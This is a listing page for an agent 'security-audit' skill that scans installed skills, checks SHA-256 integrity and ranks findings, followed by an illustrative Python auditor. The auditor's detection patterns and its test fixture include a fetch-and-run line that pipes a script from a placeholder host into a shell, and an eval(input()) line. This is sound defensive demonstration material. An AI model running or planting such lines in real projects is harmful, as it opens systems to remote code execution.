security-audit

TotalClaw, by totalclaw

Runs a comprehensive security audit of an agent's complete skill stack. Chains the scanner, differ, trust verifier and health monitor into a single assessment and delivers prioritized results together with trust attestations.

Install / download

TotalClaw CLI (recommended):

```bash
totalclaw install totalclaw:totalclaw~trypto1019-arc-security-audit
```

Direct download with cURL (no login required):

```bash
curl -fsSL https://skills.taituai.com/api/skills/totalclaw%3Atotalclaw~trypto1019-arc-security-audit/file -o trypto1019-arc-security-audit.md
```
## Original (English)

# Security Audit

One command to audit your entire skill stack. Chains together arc-skill-scanner and arc-trust-verifier, then generates a comprehensive risk report with prioritized findings.

## Why This Exists

Running individual security tools one at a time is tedious. A full audit needs scanning, trust assessment, binary verification, and a unified report. This skill does it all in one pass.

## Commands

### Audit all installed skills
```bash
python3 {baseDir}/scripts/audit.py full
```

### Audit a specific skill
```bash
python3 {baseDir}/scripts/audit.py single --path ~/.openclaw/skills/some-skill/
```

### Generate audit report as JSON
```bash
python3 {baseDir}/scripts/audit.py full --json --output report.json
```

### Audit with trust attestations
```bash
python3 {baseDir}/scripts/audit.py full --attest
```

## What It Does

1. **Scans** every installed skill with arc-skill-scanner patterns
2. **Assesses trust** for each skill (provenance, code cleanliness, binary presence)
3. **Checks binary integrity** with SHA-256 checksums
4. **Generates a prioritized report** sorted by risk level
5. **Optionally creates trust attestations** for skills that pass all checks

## Output

The audit report includes:
- Summary: total skills scanned, findings by severity, overall risk level
- Per-skill breakdown: findings, trust score, recommendations
- Critical actions: what to fix immediately
- Trust attestations for passing skills (if the `--attest` flag is used)
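As an added illustration (not the skill's own `audit.py`, whose internals this page does not show), the following Python sketch runs the steps listed under "What It Does" over a single skill directory and emits a report shaped like the "Output" section: a small regex pass standing in for arc-skill-scanner's pattern set, a SHA-256 integrity check of every file against a manifest, and a severity-sorted summary with the critical actions and attestation eligibility. The `manifest.json` layout, the two detection patterns, the severity assignments and the sample skill it builds in a temporary directory are all constructed assumptions for the demo.

```python
"""Added example, not the skill's own code. Assumes each skill ships a
manifest.json with a "checksums" map of relative path -> SHA-256 hex digest
(the real skill's manifest format is not documented on this page)."""
import hashlib
import json
import re
import tempfile
from collections import Counter
from pathlib import Path

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}

# Constructed stand-ins for arc-skill-scanner's patterns (step 1).
SCAN_PATTERNS = [
    ("high", re.compile(r"\beval\s*\("), "dynamic code evaluation"),
    ("critical", re.compile(r"curl\b[^\n|]*\|\s*(ba)?sh\b"), "remote script piped to a shell"),
]


def sha256_file(path: Path) -> str:
    """Stream the file so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_sources(skill_dir: Path) -> list:
    """Step 1: regex scan of the skill's text files."""
    findings = []
    for p in sorted(skill_dir.rglob("*")):
        if not p.is_file() or p.suffix not in {".py", ".sh", ".md"}:
            continue
        text = p.read_text(errors="replace")
        rel = p.relative_to(skill_dir).as_posix()
        for sev, rx, why in SCAN_PATTERNS:
            if rx.search(text):
                findings.append({"severity": sev, "file": rel, "message": why})
    return findings


def check_integrity(skill_dir: Path, manifest: dict) -> list:
    """Step 3: every manifest entry must exist and hash to its recorded SHA-256;
    any file without a manifest entry is reported as unverified."""
    findings = []
    listed = manifest.get("checksums", {})
    for rel, expected in listed.items():
        p = skill_dir / rel
        if not p.is_file():
            findings.append({"severity": "high", "file": rel, "message": "listed in manifest but missing"})
        elif sha256_file(p) != expected:
            findings.append({"severity": "critical", "file": rel, "message": "SHA-256 mismatch (modified after packaging)"})
    for p in sorted(skill_dir.rglob("*")):
        rel = p.relative_to(skill_dir).as_posix()
        if p.is_file() and rel != "manifest.json" and rel not in listed:
            findings.append({"severity": "medium", "file": rel, "message": "not covered by a manifest checksum"})
    return findings


def build_report(skill_name: str, findings: list) -> dict:
    """Step 4: sort by severity and summarise, mirroring the Output section."""
    ordered = sorted(findings, key=lambda f: (SEVERITY_RANK[f["severity"]], f["file"]))
    risk = ordered[0]["severity"] if ordered else "low"
    return {
        "skill": skill_name,
        "summary": {"findings_by_severity": dict(Counter(f["severity"] for f in ordered)), "overall_risk": risk},
        "findings": ordered,
        "critical_actions": [f"{f['file']}: {f['message']}" for f in ordered if f["severity"] == "critical"],
        "attestation_eligible": not ordered,  # step 5: only a clean skill would be attested
    }


def audit_skill(skill_dir: Path) -> dict:
    manifest = json.loads((skill_dir / "manifest.json").read_text())
    return build_report(skill_dir.name, scan_sources(skill_dir) + check_integrity(skill_dir, manifest))


def make_sample_skill() -> Path:
    """Constructed fixture: one intact file, one file tampered after packaging, one unlisted script."""
    root = Path(tempfile.mkdtemp()) / "demo-skill"
    root.mkdir()
    (root / "SKILL.md").write_text("# demo\n")
    (root / "run.py").write_text("print('ok')\n")
    manifest = {"checksums": {name: sha256_file(root / name) for name in ("SKILL.md", "run.py")}}
    (root / "manifest.json").write_text(json.dumps(manifest))
    # Modify run.py after the manifest was written so its recorded hash no longer matches.
    (root / "run.py").write_text("import os; eval(input())\n")
    (root / "setup.sh").write_text("curl -fsSL http://example.invalid/x.sh | sh\n")
    return root


if __name__ == "__main__":
    print(json.dumps(audit_skill(make_sample_skill()), indent=2))
```

Running it prints a report whose overall risk is `critical`, because the tampered `run.py` fails its checksum and `setup.sh` both matches a pattern and has no manifest entry; a skill with no findings would instead come out `low` and eligible for attestation.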